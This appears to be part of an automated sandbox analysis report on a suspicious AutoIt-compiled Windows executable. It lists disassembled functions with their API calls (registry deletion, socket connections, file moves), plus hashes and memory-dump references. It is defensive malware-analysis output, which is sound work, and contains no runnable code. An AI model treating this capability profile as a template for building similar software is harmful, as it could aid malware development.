                                                                • Part of subcall function 00F7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F73697,?), ref: 00F7468B
                                                                • Part of subcall function 00F7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F73697,?), ref: 00F746A4
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00F736B7
                                                              • _wcscmp.LIBCMT ref: 00F736D3
                                                              • MoveFileW.KERNEL32(?,?), ref: 00F736EB
                                                              • _wcscat.LIBCMT ref: 00F73733
                                                              • SHFileOperationW.SHELL32(?), ref: 00F7379F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 1377345388-1173974218
                                                              • Opcode ID: 2df437477093f6bfd4982b2f37721fffa23b2128b47ccf46f7bf531156cbec7d
                                                              • Instruction ID: fb7a5b122db1454205774743a2fee4c438fd96737049fd4448aa644c3e352f78
                                                              • Opcode Fuzzy Hash: 2df437477093f6bfd4982b2f37721fffa23b2128b47ccf46f7bf531156cbec7d
                                                              • Instruction Fuzzy Hash: D3418F72508345BAC755EF64C841ADFB7E8AF88390F40482FB489C3251EB38D689E753
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F972AA
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F97351
                                                              • IsMenu.USER32(?), ref: 00F97369
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F973B1
                                                              • DrawMenuBar.USER32 ref: 00F973C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                              • String ID: 0
                                                              • API String ID: 3866635326-4108050209
                                                              • Opcode ID: f55da2480e2928360626b3a828b1a074d7ac35ec28bf6f62dcaa0e732cfb716c
                                                              • Instruction ID: 76a5cee510be33c8a5603c37165f3855530c37c4339b63aeaf2c92ac1f339144
                                                              • Opcode Fuzzy Hash: f55da2480e2928360626b3a828b1a074d7ac35ec28bf6f62dcaa0e732cfb716c
                                                              • Instruction Fuzzy Hash: 87410575A14308EFEF20EF50D884E9ABBB9FB05320F18852AFD1597250D731AD54EB50
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F90FD4
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F90FFE
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00F910B5
                                                                • Part of subcall function 00F90FA5: RegCloseKey.ADVAPI32(?), ref: 00F9101B
                                                                • Part of subcall function 00F90FA5: FreeLibrary.KERNEL32(?), ref: 00F9106D
                                                                • Part of subcall function 00F90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F91090
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F91058
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 939b85d9cfaacdd0af94c3b34c757bb9283d12d5a4b384116fe9ab478ca0508d
                                                              • Instruction ID: 2fd1127065ce869f8efd52c9471fafc6c640326c186ac5caaf5851b6fdacd1ca
                                                              • Opcode Fuzzy Hash: 939b85d9cfaacdd0af94c3b34c757bb9283d12d5a4b384116fe9ab478ca0508d
                                                              • Instruction Fuzzy Hash: E831EE71D01109BFEF259B90DC89AFFB7BCEF08354F00017AE512E2151EA755E89AAA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F962EC
                                                              • GetWindowLongW.USER32(015E86F8,000000F0), ref: 00F9631F
                                                              • GetWindowLongW.USER32(015E86F8,000000F0), ref: 00F96354
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F96386
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F963B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00F963C1
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F963DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: c066ec2c890ae7d6f5f81981a5e567b201a1e56ecf23826a4167ae73fccfc05c
                                                              • Instruction ID: ca6849bcc1e3e441c8b9ffd53e823f834e6eacec0dc83d35a94caaff495de582
                                                              • Opcode Fuzzy Hash: c066ec2c890ae7d6f5f81981a5e567b201a1e56ecf23826a4167ae73fccfc05c
                                                              • Instruction Fuzzy Hash: C931F031A44254AFEB218F29DC85F5437E1BB4A724F1901A6F501CB2B2CB72A844BB50
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F6DB2E
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F6DB54
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00F6DB57
                                                              • SysAllocString.OLEAUT32(?), ref: 00F6DB75
                                                              • SysFreeString.OLEAUT32(?), ref: 00F6DB7E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00F6DBA3
                                                              • SysAllocString.OLEAUT32(?), ref: 00F6DBB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: a2294c07903695bb20f96a84b2f7301a5795bb90e79b1ee3751be615a37dc45a
                                                              • Instruction ID: 91527e2684730b00af66f173fdd1f8fc52d075ab5900274d09ebc8c62caf9554
                                                              • Opcode Fuzzy Hash: a2294c07903695bb20f96a84b2f7301a5795bb90e79b1ee3751be615a37dc45a
                                                              • Instruction Fuzzy Hash: 2A21A132B01219AF9F10DFA8DC88CBB73ACEB49360B018126F914DB250DB709C45A7A0
                                                              APIs
                                                                • Part of subcall function 00F87D8B: inet_addr.WSOCK32(00000000), ref: 00F87DB6
                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 00F861C6
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F861D5
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F8620E
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00F86217
                                                              • WSAGetLastError.WSOCK32 ref: 00F86221
                                                              • closesocket.WSOCK32(00000000), ref: 00F8624A
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F86263
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 910771015-0
                                                              • Opcode ID: a1d8bb8fc30de3257992ab101b878c671f04623c6d73b4c02779e8645c5a6bf8
                                                              • Instruction ID: 0660ab6b0960568efdb980881c12462f2f6386ecf02f17ec0a20a1f7cfefc964
                                                              • Opcode Fuzzy Hash: a1d8bb8fc30de3257992ab101b878c671f04623c6d73b4c02779e8645c5a6bf8
                                                              • Instruction Fuzzy Hash: DE31A131600108ABDF10AF64CC89BFE77ACEF45765F044069FD05E7291CB74AD48ABA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: 9eca225611a7c0f5daa7c6213e515a41db18b47fca7ad67ea25d8c6962fa1a2a
                                                              • Instruction ID: 3dfb8af50aeda4c51c40fd0315ce90415847a41c3501c5be4a03028c1da01cc2
                                                              • Opcode Fuzzy Hash: 9eca225611a7c0f5daa7c6213e515a41db18b47fca7ad67ea25d8c6962fa1a2a
                                                              • Instruction Fuzzy Hash: D62146B26541116AD320EA34FC03FA77398EF56360F14403AF846C6191EB569E8AF2A5
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F6DC09
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F6DC2F
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00F6DC32
                                                              • SysAllocString.OLEAUT32 ref: 00F6DC53
                                                              • SysFreeString.OLEAUT32 ref: 00F6DC5C
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00F6DC76
                                                              • SysAllocString.OLEAUT32(?), ref: 00F6DC84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 297b918f6db04bfa1cd5203903012228161fcc7213a2bb4ea7919665a09cf42c
                                                              • Instruction ID: b4c0a77959c8bf9a7acf59689857ec3f769f6a17acf5548874a3950ee88d1495
                                                              • Opcode Fuzzy Hash: 297b918f6db04bfa1cd5203903012228161fcc7213a2bb4ea7919665a09cf42c
                                                              • Instruction Fuzzy Hash: 6A214436B04208AFDB10DFA8DC88DAB77ECEB09360B108126F914CB261DA74DC45E764
                                                              APIs
                                                                • Part of subcall function 00F11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F11D73
                                                                • Part of subcall function 00F11D35: GetStockObject.GDI32(00000011), ref: 00F11D87
                                                                • Part of subcall function 00F11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F11D91
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F97632
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F9763F
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F9764A
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F97659
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F97665
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 9c4aaf66e404cda0c60dbe9ee76f76e064b7645c5f4dfb726197d8566390d73a
                                                              • Instruction ID: f78df3f2bf2b1421e69dc80bd62414cd6773510186f9d6453f57bbb70b4c284d
                                                              • Opcode Fuzzy Hash: 9c4aaf66e404cda0c60dbe9ee76f76e064b7645c5f4dfb726197d8566390d73a
                                                              • Instruction Fuzzy Hash: 2A11B6B211021DBFFF159F64CC85EE77F5DEF08798F114115B604A2050CA729C21EBA4
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00F39AE6
                                                                • Part of subcall function 00F33187: EncodePointer.KERNEL32(00000000), ref: 00F3318A
                                                                • Part of subcall function 00F33187: __initp_misc_winsig.LIBCMT ref: 00F331A5
                                                                • Part of subcall function 00F33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F39EA0
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F39EB4
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F39EC7
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F39EDA
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F39EED
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F39F00
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F39F13
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F39F26
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F39F39
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F39F4C
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F39F5F
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F39F72
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F39F85
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F39F98
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F39FAB
                                                                • Part of subcall function 00F33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F39FBE
                                                              • __mtinitlocks.LIBCMT ref: 00F39AEB
                                                              • __mtterm.LIBCMT ref: 00F39AF4
                                                                • Part of subcall function 00F39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F39AF9,00F37CD0,00FCA0B8,00000014), ref: 00F39C56
                                                                • Part of subcall function 00F39B5C: _free.LIBCMT ref: 00F39C5D
                                                                • Part of subcall function 00F39B5C: DeleteCriticalSection.KERNEL32(00FCEC00,?,?,00F39AF9,00F37CD0,00FCA0B8,00000014), ref: 00F39C7F
                                                              • __calloc_crt.LIBCMT ref: 00F39B19
                                                              • __initptd.LIBCMT ref: 00F39B3B
                                                              • GetCurrentThreadId.KERNEL32 ref: 00F39B42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 99a7b054e1e21e2e4e746fa024960a2b0c1b32d9c501fb95a8f01ae3d8e330f3
                                                              • Instruction ID: b5d2f9c9ebc54806fb839e2c3287e2a7062b0f7bea9b82d9d01abb68d065b693
                                                              • Opcode Fuzzy Hash: 99a7b054e1e21e2e4e746fa024960a2b0c1b32d9c501fb95a8f01ae3d8e330f3
                                                              • Instruction Fuzzy Hash: CFF0B432A1D7115AEA347774BC03A4A7690DF42730F200B1EF460C61D3FFE8854171A0
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F33F85), ref: 00F34085
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00F3408C
                                                              • EncodePointer.KERNEL32(00000000), ref: 00F34097
                                                              • DecodePointer.KERNEL32(00F33F85), ref: 00F340B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 9cb50f7db2a5064ef26f980a4d238c9daa106222af3884baebae1928732929dc
                                                              • Instruction ID: 1ecb66c15f999716d1a64e0738a593c8590b135651eac3e9714edf48ca9a0c7a
                                                              • Opcode Fuzzy Hash: 9cb50f7db2a5064ef26f980a4d238c9daa106222af3884baebae1928732929dc
                                                              • Instruction Fuzzy Hash: 43E09AB0A4220A9BEA509F75EC09B053BA5B705752F104026F601F10A0CBB79604BA16
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 3253778849-0
                                                              • Opcode ID: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
                                                              • Instruction ID: 2506e077e1f670383893f2548f3d17371efcfc553a8f2477d377a2f0373d4b29
                                                              • Opcode Fuzzy Hash: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
                                                              • Instruction Fuzzy Hash: C761BD3190465A9BCF01FF60CC91EFE37A5AF04318F44851AF8199B192DB78ED45EB91
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8FDAD,?,?), ref: 00F90E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F902BD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F902FD
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F90320
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F90349
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F9038C
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F90399
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                              • String ID:
                                                              • API String ID: 4046560759-0
                                                              • Opcode ID: 96b78f3cc98afadc1182dc1c14f48e8653e5f49861078b0e9b87e69d9db85b9a
                                                              • Instruction ID: 15a84b3294fc754adc0bc956e527f94a9a11071ad321751f0b5a21a93e8eb231
                                                              • Opcode Fuzzy Hash: 96b78f3cc98afadc1182dc1c14f48e8653e5f49861078b0e9b87e69d9db85b9a
                                                              • Instruction Fuzzy Hash: 14515831608204AFDB10EF64CC85EAABBE9FF84314F04492DF555872A2DB35E948EB52
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00F957FB
                                                              • GetMenuItemCount.USER32(00000000), ref: 00F95832
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F9585A
                                                              • GetMenuItemID.USER32(?,?), ref: 00F958C9
                                                              • GetSubMenu.USER32(?,?), ref: 00F958D7
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F95928
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
